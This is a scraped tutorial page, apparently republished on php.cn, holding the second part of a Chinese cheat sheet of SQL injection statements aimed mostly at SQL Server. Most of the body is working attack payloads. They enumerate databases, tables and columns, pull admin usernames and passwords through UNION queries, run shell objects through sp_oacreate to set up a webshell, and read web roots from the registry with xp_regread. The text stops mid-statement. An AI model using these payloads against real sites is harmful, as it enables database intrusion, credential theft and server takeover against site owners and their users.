简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Maison > base de données > tutoriel mysql > le corps du texte

常用SQL注射语句解析(2)_MySQL

WBOY
Libérer: 2016-06-01 13:51:14
original
940 Les gens l'ont consulté

bitsCN.com

   w "默认Web站点"

  -v "e","e:/"'--

  访问属性:(配合写入一个webshell)

  declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

  @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a

  w3svc/1/ROOT/e +browse'

  爆库 特殊技巧::%5c='/' 或者把/和/ 修改%5提交

  如何得到SQLSERVER某个数据库中所有表的表名?

  --------------------------------------------------------------------------------

  用户表:

  select name from sysobjects where xtype = 'U';

  系统表:

  select name from sysobjects where xtype = 'S';

  所有表:

  select name from sysobjects where xtype = 'S' or xtype = 'U';

  --------------------------------------------------------------------------------

  and 0(select top 1 paths from newtable)--

  得到库名(从1到5都是系统的id,6以上才可以判断)

  and 1=(select name from master.dbo.sysdatabases where dbid=7)--

  and 0(select count(*) from master.dbo.sysdatabases where name>1 and

  dbid=6)

  依次提交 dbid = 7,8,9.... 得到更多的数据库名

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表

  假设为 admin

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

  not in ('Admin')) 来得到其他的表。

  and 0(select count(*) from bbs.dbo.sysobjects where xtype='U' and

  name='admin'

  and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id

  and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569)

  得到一个admin的一个字段,假设为 user_id

  and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and

  name not in

  ('id',...)) 来暴出其他的字段

  and 01) 可以得到用户名

  依次可以得到密码。。。。。假设存在user_id username ,password 等字段

  and 0(select count(*) from master.dbo.sysdatabases where name>1 and

  dbid=6)

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

  not in('Address'))

  and 0(select count(*) from bbs.dbo.sysobjects where xtype='U' and

  name='admin' and uid>(str(id))) 判断id值

  and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

  ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

  ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

  (union,access也好用)
   得到WEB路径
  ;create table [dbo].[swap] ([swappass][char](255));--

  and (select top 1 swappass from swap)=1--

  ;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare

  @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',

  @key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/',

  @value_name='/', values=@test OUTPUT insert into p

 

bitsCN.com
Étiquettes associées:
w
source:php.cn
Article précédent:[转载]mysqlhotcopy 热备工具体验与总结_MySQL Article suivant:Field 'id' doesn't have a default va_MySQL
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Derniers articles par auteur
Derniers numéros
Les points de nuage de points ne conservent pas leurs valeurs lors du zoom dans d3.js C'est la première fois que j'utilise d3.js, alors soyez indulgents avec moi. Je l'ai implé...
Depuis 2024-04-06 18:16:26
0
1
403
Pourquoi l'omission de 0 ms de veille interrompt-elle mes transitions CSS ? J'essaie d'implémenter une animation FLIP pour voir si je la comprends bien. Dans ce codep...
Depuis 2024-04-06 16:29:50
0
2
490
Créez des utilisateurs dans Vue à l'aide de Firebase sans vous connecter J'ai créé un formulaire pour créer des profils d'utilisateurs. Mais chaque fois que je cré...
Depuis 2024-04-06 14:20:12
0
1
514
vue vee-validate capture le problème de la sélection du sélecteur de date La liaison v-model sur mon champ de sélecteur de date ne fonctionne pas correctement. Lors...
Depuis 2024-04-06 11:38:56
0
1
510
La v-card Vuetify s'adapte à toutes les hauteurs possibles dans v-col Je construis une page de connexion/inscription en utilisant vue et vuetify. Je mets le cod...
Depuis 2024-04-06 10:29:26
0
1
406
Rubriques connexes
Plus>
Recommandations populaires
Tutoriels populaires
Plus>
Tutoriels associés
Recommandations populaires
Derniers cours
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!